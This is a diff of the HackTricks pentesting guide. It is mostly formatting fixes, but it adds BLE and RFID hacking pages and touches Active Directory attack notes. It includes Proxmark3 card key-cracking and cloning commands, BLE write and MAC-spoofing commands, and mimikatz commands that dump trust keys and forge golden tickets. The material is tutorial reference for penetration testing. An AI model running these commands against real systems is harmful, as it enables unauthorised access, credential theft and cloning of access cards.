![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2).png>) ![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2).png>)
It means that the server **didn't receive the correct domain name** inside the Host header.\ It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
@ -336,7 +336,7 @@ You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/
![](<../../.gitbook/assets/image (183).png>) ![](<../../.gitbook/assets/image (183).png>)
Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf) Original research: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
You can also use **metasploit**: `use scanner/http/iis_shortname_scanner` You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`


@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall> </methodCall>
``` ```
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2).png>) ![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1).png>)
![](<../../.gitbook/assets/image (102).png>) ![](<../../.gitbook/assets/image (102).png>)


@ -0,0 +1,2 @@
# Radio Hacking


@ -0,0 +1,69 @@
# Pentesting BLE - Bluetooth Low Energy
## Introduction
Available since the Bluetooth 4.0 specification, BLE uses only 40 channels, covering the range of 2400 to 2483.5 MHz. In contrast, traditional Bluetooth uses 79 channels in that same range.
BLE devices communicate is by sending **advertising packets** (**beacons**), these packets broadcast the BLE devices existence to other nearby devices. These beacons sometimes **send data**, too.
The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldnt fit on the initial advertising request, such as the full device name.
![](<../../.gitbook/assets/image (201).png>)
The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV\_NONCONN\_IND and ADV\_IND. Devices use the **ADV\_NONCONN\_IND** PDU type if they **dont accept connections**, transmitting data only in the advertising packet. Devices use **ADV\_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.
### GATT
The **Generic Attribute Profile** (GATT) defines how the **device should format and transfer data**. When youre analyzing a BLE devices attack surface, youll often concentrate your attention on the GATT (or GATTs), because its how **device functionality gets triggered** and how data gets stored, grouped, and modified. The GATT lists a devices characteristics, descriptors, and services in a table as either 16- or 32-bits values. A **characteristic** is a **data** value **sent** between the central device and peripheral. These characteristics can have **descriptors** that **provide additional information about them**. **Characteristics** are often **grouped** in **services** if theyre related to performing a particular action.
## Enumeration
```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up
# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
```
### GATTool
**GATTool** allows to **establish** a **connection** with another device, listing that devices **characteristics**, and reading and writing its attributes.\
GATTTool can launch an interactive shell with the `-I` option:
```bash
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle:
0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle:
0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]
# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)
# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16
# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
```
### Bettercap
```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported
# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```


@ -0,0 +1,94 @@
# Pentesting RFID
## Introduction
**Radio Frequency Identification (RFID)** is the most popular short-range radio solution. It's usually used to store and transmit information that identifies an entity.
An RFID tag can rely on **its own power source (active)**, such as an embedded battery, or receive its power from the reading antenna using the current **induced from the received radio waves** (**passive**).
### Classes
EPCglobal divides RFID tags into six categories. A tag in each category has all the capabilities listed in the previous category, making it backward compatible.
* **Class 0** tags are **passive** tags that operate in **UHF** bands. The vendor **preprograms** them at the production factory. As a result, you **cant change** the information stored in their memory.
* **Class 1** tags can also operate in **HF** bands. In addition, they can be **written only once** after production. Many Class 1 tags can also process **cyclic redundancy checks** (CRCs) of the commands they receive. CRCs are a few extra bytes at the end of the commands for error detection.
* **Class 2** tags can be **written multiple times**.
* **Class 3** tags can contain **embedded sensors** that can record environmental parameters, such as the current temperature or the tags motion. These tags are **semi-passive**, because although they **have** an embedded power source, such as an integrated **battery**, they **cant initiate** wireless **communication** with other tags or readers.
* **Class 4** tags can initiate communication with other tags of the same class, making them **active tags**.
* **Class 5** tags can provide **power to other tags and communicate with all the previous tag** classes. Class 5 tags can act as **RFID readers**.
### Information Stored in RFID Tags
An RFID tags memory usually stores four kinds of data: the **identification data**, which **identifies** the **entity** to which the tag is attached (this data includes user-defined fields, such as bank accounts); the **supplementary data**, which provides **further** **details** regarding the entity; the **control data**, used for the tags internal **configuration**; and the tags **manufacturer data**, which contains a tags Unique Identifier (**UID**) and details regarding the tags **production**, **type**, and **vendor**. Youll find the first two kinds of data in all the commercial tags; the last two can differ based on the tags vendor.
The ISO standard specifies the Application Family Identifier (**AFI**) value, a code that indicates the **kind of object** the tag belongs to. Another important register, also specified by ISO, is the Data Storage Format Identifier(**DSFID**), which defines the **logical organization of the user data**.
Most RFID **security controls** have mechanisms that **restrict** the **read** or **write** operations on each user memory block and on the special registers containing the AFI and DSFID values. These **lock** **mechanisms** use data stored in the control memory and have **default passwords** preconfigured by the vendor but allow the tag owners to **configure custom passwords**.
### Low-Frequency RFID Tags
For example key cards that employees use to open doors. These devices rely on **passive** **RFID** technology and operate in a **range of 30 kHz to 300 kHz**, although it's more usual to use 125 kHz to 134 kHz.
### High-Frequency RFID Tags
Many people refer to this technology as **Near Field Communication (NFC)**, a term for devices operating over the 13.56 MHz frequency.
## Attacking RFID Systems with Proxmark3
The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)****[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
### Attacking MIFARE Classic 1KB
It has **16 sectors**, each of them has **4 blocks** and each block contains **16B**. The UID is in sector 0 block 0 (and can't be altered).\
To access each sector you need **2 keys** (**A** and **B**) which are stored in **block 3 of each sector** (sector trailer). The sector trailer also stores the **access bits** that give the **read and write** permissions on **each block** using the 2 keys.\
2 keys are useful to give permissions to read if you know the first one and write if you know the second one (for example).
Several attacks can be performed
```bash
proxmark3> hf mf #List attacks
proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key
proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory
proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
```
The Proxmark3 allows to perform other actions like **eavesdropping** a **Tag to Reader communication** to try to find sensitive data. In this card you could just sniff the communication with and calculate the used key because the **cryptographic operations used are weak** and knowing the plain and cipher text you can calculate it (`mfkey64` tool).
### Raw Commands
IoT systems sometimes use **nonbranded or noncommercial tags**. In this case, you can use Proxmark3 to send custom **raw commands to the tags**.
```bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
```
With this information you could try to search information about the card and about the way to communicate with it. Proxmark3 allows to send raw commands like: `hf 14a raw -p -b 7 26`
### Scripts
The Proxmark3 software comes with a preloaded list of **automation scripts** that you can use to perform simple tasks. To retrieve the full list, use the `script list` command. Next, use the `script run` command, followed by the scripts name:
```
proxmark3> script run mfkeys
```
You can create a script to **fuzz tag readers**, so copying the data of a **valid card** just write a **Lua script** that **randomize** one or more random **bytes** and check if the **reader crashes** with any iteration.


@ -333,7 +333,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (5).png>) ![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (4).png>)
{% hint style="info" %} {% hint style="info" %}
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\ It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\


@ -18,7 +18,7 @@ Main concepts of an Active Directory:
1. **Directory** Contains all the information about the objects of the Active directory 1. **Directory** Contains all the information about the objects of the Active directory
2. **Object** An object references almost anything inside the directory (a user, group, shared folder...) 2. **Object** An object references almost anything inside the directory (a user, group, shared folder...)
3. **Domain** The objects of the directory are contained inside the domain. Inside a "forest" more than one domain can exist and each of them will have their own objects collection.&#x20; 3. **Domain** The objects of the directory are contained inside the domain. Inside a "forest" more than one domain can exist and each of them will have their own objects collection.
4. **Tree** Group of domains with the same root. Example: _dom.local, email.dom.local, www.dom.local_ 4. **Tree** Group of domains with the same root. Example: _dom.local, email.dom.local, www.dom.local_
5. **Forest** The forest is the highest level of the organization hierarchy and is composed by a group of trees. The trees are connected by trust relationships. 5. **Forest** The forest is the highest level of the organization hierarchy and is composed by a group of trees. The trees are connected by trust relationships.
@ -52,7 +52,7 @@ If you just have access to an AD environment but you don't have any credentials/
* `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>` * `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
* `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>` * `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
* `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //` * `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
* [**A more detailed guide on how to enumerate a SMB server can be found here.**](broken-reference) * [**A more detailed guide on how to enumerate a SMB server can be found here.**](broken-reference/)
* **Enumerate Ldap**: * **Enumerate Ldap**:
* `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>` * `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
* [**A more detailed guide on how to enumerate LDAP can be found here.**](../../pentesting/pentesting-ldap.md) * [**A more detailed guide on how to enumerate LDAP can be found here.**](../../pentesting/pentesting-ldap.md)
@ -62,14 +62,14 @@ If you just have access to an AD environment but you don't have any credentials/
* Gather credentials **exposing** [**fake UPnP services with evil-S**](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856) * Gather credentials **exposing** [**fake UPnP services with evil-S**](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
* [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology): * [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
* Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available. * Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available.
* If you find the complete names of company workers, you could try different AD **username conventions ([**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)**). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123). * If you find the complete names of company workers, you could try different AD **username conventions (**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123).
* Tools: * Tools:
* [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username) * [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
* [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy) * [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
### User enumeration ### User enumeration
When an **invalid username is requested** the server will respond using the **Kerberos error** code *KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN*, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error *KRB5KDC\_ERR\_PREAUTH\_REQUIRED*, indicating that the user is required to perform pre-authentication. When an **invalid username is requested** the server will respond using the **Kerberos error** code _KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error _KRB5KDC\_ERR\_PREAUTH\_REQUIRED_, indicating that the user is required to perform pre-authentication.
``` ```
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
@ -83,13 +83,12 @@ crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
Ok, so you know you have already a valid username but no passwords... Then try: Ok, so you know you have already a valid username but no passwords... Then try:
* [**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute *DONT\_REQ\_PREAUTH* you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user. * [**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute _DONT\_REQ\_PREAUTH_ you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user.
* [**Password Spraying**](password-spraying.md): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!) or could login with empty password: [Invoke-SprayEmptyPassword.ps1](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1). * [**Password Spraying**](password-spraying.md): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!) or could login with empty password: [Invoke-SprayEmptyPassword.ps1](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1).
## Enumerating Active Directory WITH credentials/session ## Enumerating Active Directory WITH credentials/session
For this phase you need to have **compromised the credentials or a session of a valid domain account.** For this phase you need to have **compromised the credentials or a session of a valid domain account.** If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.
If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.
### Enumeration ### Enumeration
@ -103,7 +102,7 @@ Regarding [**ASREPRoast**](asreproast.md)you can now find every possible vulnera
* You could use some[Windows binaries from the CMD to perform a basic recon](../basic-cmd-for-pentesters.md#domain-info), but using [powershell for recon](../basic-powershell-for-pentesters/) will probably be stealthier, and you could even [**use powerview**](../basic-powershell-for-pentesters/powerview.md) **to extract more detailed information**. Always **learn what a CMD or powershell/powerview command does** before executing it, this way you will know **how stealth are you being**. * You could use some[Windows binaries from the CMD to perform a basic recon](../basic-cmd-for-pentesters.md#domain-info), but using [powershell for recon](../basic-powershell-for-pentesters/) will probably be stealthier, and you could even [**use powerview**](../basic-powershell-for-pentesters/powerview.md) **to extract more detailed information**. Always **learn what a CMD or powershell/powerview command does** before executing it, this way you will know **how stealth are you being**.
* Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a **try**. Find where users can RDP, find path to other groups, etc. * Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a **try**. Find where users can RDP, find path to other groups, etc.
* Look in the LDAP database, with **ldapsearch** or **AdExplorer.exe** to look for credentials in fields *userPassword* & *unixUserPassword*, or even for *Description*. * Look in the LDAP database, with **ldapsearch** or **AdExplorer.exe** to look for credentials in fields _userPassword_ & _unixUserPassword_, or even for _Description_.
* If you are using **Linux**, you could also enumerate the domain using [the-useless-one/pywerview](https://github.com/the-useless-one/pywerview). * If you are using **Linux**, you could also enumerate the domain using [the-useless-one/pywerview](https://github.com/the-useless-one/pywerview).
* You could also try automated tools as: * You could also try automated tools as:
* [tomcarver16/ADSearch](https://github.com/tomcarver16/ADSearch) * [tomcarver16/ADSearch](https://github.com/tomcarver16/ADSearch)
@ -113,9 +112,7 @@ Regarding [**ASREPRoast**](asreproast.md)you can now find every possible vulnera
### **Kerberoast** ### **Kerberoast**
The goal of Kerberoasting is to harvest **TGS tickets for services that run on behalf of domain user accounts**, not computer accounts. Thus, part of these TGS tickets are **encrypted wit keys derived from user passwords**. As a consequence, their credentials could be **cracked offline**. The goal of Kerberoasting is to harvest **TGS tickets for services that run on behalf of domain user accounts**, not computer accounts. Thus, part of these TGS tickets are **encrypted wit keys derived from user passwords**. As a consequence, their credentials could be **cracked offline**. You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**. **Find more information about this attack** [**in the Kerberoast page**](kerberoast.md)**.**
You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.
**Find more information about this attack [**in the Kerberoast page**](kerberoast.md).**
### Remote connexion (RDP, SSH, FTP, Win-RM, etc) ### Remote connexion (RDP, SSH, FTP, Win-RM, etc)
@ -219,7 +216,7 @@ And if someone tries to delete this user from the Domain Admins (for example) in
### **DSRM Credentials** ### **DSRM Credentials**
There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\ There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\
[**More information about DSRM Credentials here.**](dsrm-credentials.md)**** [**More information about DSRM Credentials here.**](dsrm-credentials.md)\*\*\*\*
### **ACL Persistence** ### **ACL Persistence**
@ -246,7 +243,7 @@ You can create you **own SSP** to **capture** in **clear text** the **credential
It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\ It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\
Note that if you use wrong data, pretty ugly logs will appear.\ Note that if you use wrong data, pretty ugly logs will appear.\
[**More information about DCShadow here.**](dcshadow.md)**** [**More information about DCShadow here.**](dcshadow.md)\*\*\*\*
## **Forest Privilege Escalation -** Domain Trusts ## **Forest Privilege Escalation -** Domain Trusts
@ -283,7 +280,7 @@ A trust relationship can also be **transitive** (A trust B, B trust C, then A tr
1. **Enumerate** the trusting relationships 1. **Enumerate** the trusting relationships
2. Check if any **security principal** (user/group/computer) has **access** to resources of the **other domain**, maybe by ACE entries or by being in groups of the other domain. Look for **relationships across domains** (the trust was created for this probably). 2. Check if any **security principal** (user/group/computer) has **access** to resources of the **other domain**, maybe by ACE entries or by being in groups of the other domain. Look for **relationships across domains** (the trust was created for this probably).
1. kerberoast in this case could be another option. 1. kerberoast in this case could be another option.
3. **Compromise** the **accounts** which can **pivot** through domains.&#x20; 3. **Compromise** the **accounts** which can **pivot** through domains.
There are three **main** ways that security principals (users/groups/computer) from one domain can have access into resources in another foreign/trusting domain: There are three **main** ways that security principals (users/groups/computer) from one domain can have access into resources in another foreign/trusting domain:
@ -293,7 +290,7 @@ There are three **main** ways that security principals (users/groups/computer) f
### Child-to-Parent forest privilege escalation ### Child-to-Parent forest privilege escalation
Also, notice that there are **2 trusted keys**, one for _Child --> Parent_ and another one for P_arent --> Child_. Also, notice that there are **2 trusted keys**, one for _Child --> Parent_ and another one for P\_arent --> Child\_.
```bash ```bash
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
@ -312,7 +309,7 @@ Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarco
/ticket:C:\path\save\ticket.kirbi /ticket:C:\path\save\ticket.kirbi
``` ```
For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in S-1-5-21_root domain_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_ For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in S-1-5-21\_root domain\_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_
[http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
@ -379,7 +376,7 @@ Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current
**For user objects:** **For user objects:**
* ObjectSID (different from the domain) * ObjectSID (different from the domain)
* lastLogon, lastlogontimestamp&#x20; * lastLogon, lastlogontimestamp
* Logoncount (very low number is suspicious) * Logoncount (very low number is suspicious)
* whenCreated * whenCreated
* Badpwdcount (very low number is suspicious) * Badpwdcount (very low number is suspicious)
@ -410,6 +407,6 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
* [Python script to enumerate active directory](https://github.com/ropnop/windapsearch) * [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
* [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum) * [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)
![](<../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (10).png>) ![](<../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)


@ -8,53 +8,53 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)**** ### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)\*\*\*\*
### [System Info](windows-local-privilege-escalation/#system-info) ### [System Info](windows-local-privilege-escalation/#system-info)
* [ ] Obtain [**System information**](windows-local-privilege-escalation/#system-info)**** * [ ] Obtain [**System information**](windows-local-privilege-escalation/#system-info)\*\*\*\*
* [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)**** * [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)\*\*\*\*
* [ ] Use **Google to search** for kernel **exploits** * [ ] Use **Google to search** for kernel **exploits**
* [ ] Use **searchsploit to search** for kernel **exploits** * [ ] Use **searchsploit to search** for kernel **exploits**
* [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/#environment)? * [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/#environment)?
* [ ] Passwords in [**PowerShell history**](windows-local-privilege-escalation/#powershell-history)? * [ ] Passwords in [**PowerShell history**](windows-local-privilege-escalation/#powershell-history)?
* [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/#internet-settings)? * [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/#internet-settings)?
* [ ] [**Drives**](windows-local-privilege-escalation/#drives)? * [ ] [**Drives**](windows-local-privilege-escalation/#drives)?
* [ ] ****[**WSUS exploit**](windows-local-privilege-escalation/#wsus)? * [ ] \*\*\*\*[**WSUS exploit**](windows-local-privilege-escalation/#wsus)?
* [ ] ****[**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)? * [ ] \*\*\*\*[**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)?
### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration) ### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration)
* [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings * [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings
* [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)**** * [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)\*\*\*\*
* [ ] Check if [**WDigest** ](windows-local-privilege-escalation/#wdigest)is active * [ ] Check if [**WDigest** ](windows-local-privilege-escalation/#wdigest)is active
* [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)? * [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)?
* [ ] ****[**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials) * [ ] \*\*\*\*[**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
* [ ] [**Cached Credentials**](windows-local-privilege-escalation/#cached-credentials)? * [ ] [**Cached Credentials**](windows-local-privilege-escalation/#cached-credentials)?
* [ ] Check if any [**AV**](windows-local-privilege-escalation/#av)**** * [ ] Check if any [**AV**](windows-local-privilege-escalation/#av)\*\*\*\*
* [ ] ****[**AppLocker Policy**](windows-local-privilege-escalation/#applocker-policy)? * [ ] \*\*\*\*[**AppLocker Policy**](windows-local-privilege-escalation/#applocker-policy)?
* [ ] [**UAC**](windows-local-privilege-escalation/#uac)? * [ ] [**UAC**](windows-local-privilege-escalation/#uac)?
### ****[**User Privileges**](windows-local-privilege-escalation/#users-and-groups) ### \*\*\*\*[**User Privileges**](windows-local-privilege-escalation/#users-and-groups)
